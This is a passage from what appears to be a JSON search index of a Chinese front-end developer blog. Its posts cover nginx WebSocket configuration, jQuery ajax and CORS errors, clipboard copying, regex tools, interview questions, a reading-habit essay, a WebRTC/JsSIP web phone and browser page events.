英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.","title":"在实践中我遇到stompjs, websocket和nginx的问题与总结"},{"content":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead. (See json.org for more information on proper JSON formatting.)\n设置dataType为json时,jquery就会去解析响应体为JavaScript对象。跨域的json请求会被转化成jsonp, 除非设置了jsonp: false。JSON数据会以严格模式去解析,任何不规范的JSON字符串都会解析异常并抛出错误。从jQuery 1.9起,一个空的响应也会被抛出异常。服务端应该返回一个null或者{}去代替空响应。参考json.org, 查看更多内容\n3. 解决方案 这个问题的原因是后端返回的数据格式不规范,所以后端在返回结果是,不要使用空的响应,也不应该去手动拼接JSON字符串,而应该交给响应的库来实现JSON序列化字符串工作。\n方案1: 如果后端确定响应体中不返回数据,那么就把状态码设置为204,而不是200。我一直逼着后端同事这么做。 方案2:如果后端接口想返回200,那么请返回一个null或者{}去代替空响应 方案3:别用jQuery的ajax,换个其他的库试试 4. 参考 Ajax request returns 200 OK, but an error event is fired instead of success jQuery.ajax ","permalink":"https://wdd.js.org/posts/2018/03/status-code-200-jquery-ajax-failed/","summary":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead.","title":"状态码为200时 jQuery ajax报错"},{"content":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(‘username’) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首要要去检测浏览器execCommand能力检测 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS示例的。\n注意:下面的函数必须要主动调用,这样才能给响应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","permalink":"https://wdd.js.org/posts/2018/03/clipboard-copy-tutorial/","summary":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(‘username’) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首要要去检测浏览器execCommand能力检测 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS示例的。\n注意:下面的函数必须要主动调用,这样才能给响应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","title":"前端剪贴板复制功能实现原理"},{"content":"1. 问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将相同来源策略应用到本地文件。Chrome要求比较严格,不允许这种形势的跨域请求。而最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个作为彻底。\n3.1. 方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","permalink":"https://wdd.js.org/posts/2018/03/origin-null-is-not-allowed/","summary":"1. 问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将相同来源策略应用到本地文件。Chrome要求比较严格,不允许这种形势的跨域请求。而最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个作为彻底。\n3.1. 方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","title":"Chrome本地跨域origin-null-is-not-allowed问题分析与解决方案"},{"content":"1. 功能最强:regex101 优点:\n支持多种语言, prec,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","permalink":"https://wdd.js.org/posts/2018/02/regex-online-tools/","summary":"1. 功能最强:regex101 优点:\n支持多种语言, prec,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","title":"正则表达式在线工具集合"},{"content":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.3.10. 请问下面的写法问题在哪? console.log(1) (function(){ console.log(1) })() 1.3.11. 请问s.length是多少,s[2]是多少 var s = [] s[3] = 4 s.length ? s[2] ? 1.3.12. 说说你对setTimeout的深入理解? setTimeout(function(){ console.log(\u0026#39;hi\u0026#39;) }, 1000) 1.3.13. 解释闭包概念及其作用 1.3.14. 如何理解js 函数first class的概念? 1.3.15. 函数有哪些调用方式?不同this的会指向哪里? 1.3.16. applly和call有什么区别? 1.3.17. 函数的length属性的代表什么? 1.3.18. 有用过哪些js编程风格 1.3.19. 如何理解EventLoop? 1.3.20. 使用过哪些构建工具?各有什么优缺点? 1.4. 其它 1.4.1. 平时使用什么搜索引擎查资料? 1.4.2. 对翻墙有什么看法?如何翻墙? 1.4.3. 个人有没有技术博客,地址是什么? 1.4.4. github上有没有项目? 1.5. 网络相关 1.5.1. 请求状态码 1xx,2xx,3xx,4xx,5xx分别有什么含义? 1.5.2. 发送某些post请求时,有时会多一些options请求,请问这是为什么? 1.5.3. http报文有哪些组成部分? 1.5.4. http端到端首部和逐跳首部有什么区别? 1.5.5. http与https在同时使用时,有什么注意点? 1.5.6. http, tcp, udp, websocket,分别位于7层网络的那一层?tcp和udp有什么不同? 2. 编码题 2.1. 写一个函数,返回一个数组中所有元素被第一个元素除后的结果 2.2. 写一个函数,来判断变量是否是数组,至少使用两种写法 2.3. 写一个函数,将秒转化成时分秒格式,如80转化成:00:01:20 写一个函数,将对象中属性值为\u0026rsquo;\u0026rsquo;, undefined, null的属性删除掉 // 处理前 var obj = { name: \u0026#39;wdd\u0026#39;, address: { code: \u0026#39;\u0026#39;, tt: null, age: 1 }, ss: [], vv: undefined } // 处理后 { name: \u0026#39;wdd\u0026#39;, address: { age: 1 }, ss: [] } 3. 翻译题 Aggregation operations process data records and return computed results. Aggregation operations group values from multiple documents together, and can perform a variety of operations on the grouped data to return a single result. MongoDB provides three ways to perform aggregation: the aggregation pipeline, the map-reduce function, and single purpose aggregation methods.\n","permalink":"https://wdd.js.org/posts/2018/02/front-end-interview-handbook/","summary":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.","title":"前端面试和笔试题目"},{"content":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很多。我是确实需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一下电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少的金钱的情况下。我是非常不愿因让我的金钱的付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己指定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看的流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要度呢? 所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做的不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要用有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。\n","permalink":"https://wdd.js.org/posts/2018/02/small-is-better-than-big/","summary":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很多。我是确实需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一下电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少的金钱的情况下。我是非常不愿因让我的金钱的付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己指定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看的流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要度呢? 所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做的不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要用有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。","title":"small is better than big 我的读书方法论"},{"content":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.com\u0026#39;, password : \u0026#39;superpassword\u0026#39; }; var ua = new JsSIP.UA(configuration); ua.start(); // Register callbacks to desired call events var eventHandlers = { \u0026#39;progress\u0026#39;: function(e) { console.log(\u0026#39;call is in progress\u0026#39;); }, \u0026#39;failed\u0026#39;: function(e) { console.log(\u0026#39;call failed with cause: \u0026#39;+ e.data.cause); }, \u0026#39;ended\u0026#39;: function(e) { console.log(\u0026#39;call ended with cause: \u0026#39;+ e.data.cause); }, \u0026#39;confirmed\u0026#39;: function(e) { console.log(\u0026#39;call confirmed\u0026#39;); } }; var options = { \u0026#39;eventHandlers\u0026#39; : eventHandlers, \u0026#39;mediaConstraints\u0026#39; : { \u0026#39;audio\u0026#39;: true, \u0026#39;video\u0026#39;: true } }; var session = ua.call(\u0026#39;sip:bob@example.com\u0026#39;, options); 2.2 SIP.js sip.js项目实际是fork自jsSIP的,这里主要介绍它的服务端支持情况。其他接口自己自行查阅\nFreeSWITCH Asterisk OnSIP FreeSWITCH Legacy 3. 平台考量 由于WebRTC对浏览器有较高的要求,你可以看看下图,哪些浏览器支持WebRTC, 所有IE浏览器都不行,chrome系支持情况不错。\n3.1 考量标准 跨平台 兼容性 体积 集成性 硬件要求 开发成本 3.2 考量表格 种类 适用平台 优点 缺点 基于electron开发的桌面客户端 window, mac, linux 跨平台,兼容好 要下载安装,体积大(压缩后至少48MB),对电脑性能有要求 开发js sdk 现代浏览器 体积小,容易第三方集成 兼容差(因为涉及到webRTC, IE11以及以都不行,对宿主环境要求高),客户集成需要开发量 开发谷歌浏览器扩展 谷歌浏览器 体积小 兼容差(仅限类chrome浏览器) 4 参考文档 and 延伸阅读 and 动手实践 Js SIP Getting Started 120行代码实现 浏览器WebRTC视频聊天 SIP协议状态码: 5 常见问题 422: \u0026ldquo;Session Interval Too Small\u0026rdquo; jsSIP默认携带Session-Expires: 90的头部信息,如果这个超时字段小于服务端的设定值,那么就会得到如下422的响应。参见SIP协议状态码:, 可以在call请求中设置sessionTimersExpires, 使其超过服务端的设定值即可\ncall(targer, options ) option.sessionTimersExpires Number (in seconds) for the default Session Timers interval (default value is 90, do not set a lower value). 6 最后,你我共勉 ","permalink":"https://wdd.js.org/posts/2018/02/webrtc-web-sip-phone/","summary":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.","title":"基于 WebRTC 构建 Web SIP Phone"},{"content":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 